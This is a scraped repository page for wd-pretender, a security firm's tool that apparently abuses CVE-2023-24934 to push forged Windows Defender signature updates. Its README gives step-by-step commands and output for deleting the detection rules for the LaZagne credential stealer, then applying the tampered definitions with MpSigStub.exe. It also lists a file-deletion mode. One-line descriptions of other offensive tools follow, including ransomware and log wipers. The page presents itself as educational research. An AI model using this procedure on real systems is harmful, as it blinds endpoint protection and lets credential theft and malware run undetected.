• Stars
    star
    115
  • Rank 305,916 (Top 7 %)
  • Language
    Python
  • License
    BSD 3-Clause "New...
  • Created almost 2 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

wd-pretender

TL;DR

Compatible with Windows Defender platform version 4.18.2302.7 and earlier.

Description

wd-pretender is a powerful tool designed to simulate a Windows Defender update using the CVE-2023-24934 vulnerability. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

Features

  • Bypass EDR Rules: Bypass certain Windows Defender security measures and remain undetected.

Installation

Windows with Python 3.10+ with the libraries mentioned in the file requirements.txt

Usage

-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --

[+] Getting Signatures Location ...
usage: wd-pretender.py command [options]

Windows Defender Update

positional arguments:
  {bypass,delete,friendly}
    bypass              bypass windows defender rules by threat name
    delete              delete file by modifying rules
    friendly            add hash to friendly files threat

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT             output folder for the exported vdm files
  -d DEFINITIONS_PATH   set explicit definitions path

Bypass

        -- Defender-Pretender: v1.0.0 (SafeBreach Labs) --

[+] Getting Signatures Location ...
usage: wd-pretender.py command [options] bypass [-h] threat_name

positional arguments:
  threat_name  delete all threats matching <threat_name>

For example we want to bypass LaZagne rules and be able to execute LaZagne without been detected by Windows Defender.

python wd-pretender.py -o C:\BypassDefs bypass lazagne

Output:

python .\wd-pretender.py -o C:\Definitions bypass lazagne

        -- Defender-Pretender: v1.0.0 (SafeBreach Labs) --

[+] Getting Signatures Location ...
[+] Definitions Path: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5235DDA9-EDFD-456F-A39A-88CF98DA5B71}
[+] Loading mpasbase.vdm
[+] Loading mpasdlta.vdm
[+] Loading mpavbase.vdm
[+] Loading mpavdlta.vdm
[+] Enumerating Anti-Virus Definitions
[+] Threats Containing: lazagne
        Deleting => b'\xd8!LaZagne'
        Deleting => b'HackTool:Python/LaZagne'
        Deleting => b'HackTool:Python/LaZagne.A!MTB'
        Deleting => b'\xd8!LaZagne!ml'
        Deleting => b'HackTool:Python/LaZagne.D!MTB'
        Deleting => b'\xcc!Golazagne.A!MTB'
        Deleting => b'HackTool:Python/LaZagne.B'
        Deleting => b'\xd8!LaZagne!sms'
        Deleting => b'\xcc!Lazagne.A!MTB'
        Deleting => b'\xcc\xe1Lazagne'
[+] Enumerating Anti-Spyware Definitions
[+] Threats Containing: lazagne
[+] Exporting Definitions into: C:\Definitions
[+] mpasdlta.vdm: 1.391.491.0 => 1.391.492.0
[+] mpavdlta.vdm: 1.391.491.0 => 1.391.492.0
[+] Done!

The output displays the deleted threat rules recorded by the tool, indicating the removal of 10 threats from the Anti-Virus definitions. The newly updated definitions have been exported to the user-supplied export path located at C:\BypassDefs.

To proceed, ensure that MpSigStub.exe is copied to the BypassDefs folder. Following that, execute the following command:

MpSigStub.exe /stub 1.1.18500.10 /payload <defintion_new_version>

The export log generated by wd-pretender confirms the presence of the updated definitions with the version indicated as <definition_new_version>.

To verify the successful update, please refer to the "MpSigStub.log" file located in the Temp folder of the user with whom the execution took place. For instance, if the tool was executed with administrator privileges (although it is not a requirement), the log file can be found at C:\Windows\Temp.

License

wd-pretender is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

More Repositories

1

pinjectra

Pinjectra is a C/C++ OOP-like library that implements Process Injection techniques (with focus on Windows 10 64-bit)
C++
785
star
2

SirepRAT

Remote Command Execution as SYSTEM on Windows IoT Core (releases available for Python2.7 & Python3)
Python
369
star
3

EDRaser

EDRaser is a powerful tool for remotely deleting access logs, Windows event logs, databases, and other files on remote machines. It offers two modes of operation: automated and manual.
Python
325
star
4

pwndsh

Post-exploitation framework (and an interactive shell) developed in Bash shell scripting
Shell
306
star
5

pacdoor

Proof-of-concept JavaScript malware implemented as a Proxy Auto-Configuration (PAC) File
Python
152
star
6

pyekaboo

Proof-of-concept program that is able to to hijack/hook/proxy Python module(s) thanks to $PYTHONPATH variable
Python
148
star
7

Back2TheFuture

Find patterns of vulnerabilities on Windows in order to find 0-day and write exploits of 1-days. We use Microsoft security updates in order to find the patterns.
C
146
star
8

hAFL2

A kAFL based hypervisor fuzzer which fully supports nested VMs
Python
133
star
9

CloudMiner

Execute code using Azure Automation service without getting charged
Python
127
star
10

DoubleDrive

A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files
Python
122
star
11

SimpleBITSServer

A simple python implementation of a BITS server.
Python
101
star
12

BITSInject

A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service), allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account
Python
97
star
13

mkmalwarefrom

Proof-of-concept two-stage dropper generator that uses bits from external sources
Python
96
star
14

spacebin

Spacebin is a proof-of-concept malware that exfiltrates data (from No Direct Internet Access environments) via triggering AV on the endpoint and then communicating back from the AV's cloud component.
Python
85
star
15

CortexVortex

Python
72
star
16

backdoros

backdorOS is an in-memory OS written in Python 2.7 with a built-in in-memory filesystem, hooks for open() calls and imports, Python REPL etc.
Python
65
star
17

aikido_wiper

Python
64
star
18

Spooler

C
57
star
19

AltFS

The Alternative Fileless File System
Python
54
star
20

HRS

Perl
43
star
21

RSFW

Request Smuggling Firewall
C++
43
star
22

cachetalk

Proof-of-concept program that is able to read and write arbitrary bits using HTTP server-side caching
Python
36
star
23

QuickShell

A library and a set of tools for exploiting and communicating with Google's Quick Share devices.
C++
31
star
24

BACE

Mapping of Binaries that allows Arbitrary Code Execution
24
star
25

CoWTools

Tools for analyzing Windows containers and break container's isolation
C++
21
star
26

blog-snippets

Repository of Code Snippets from various SafeBreach Blog posts
Python
5
star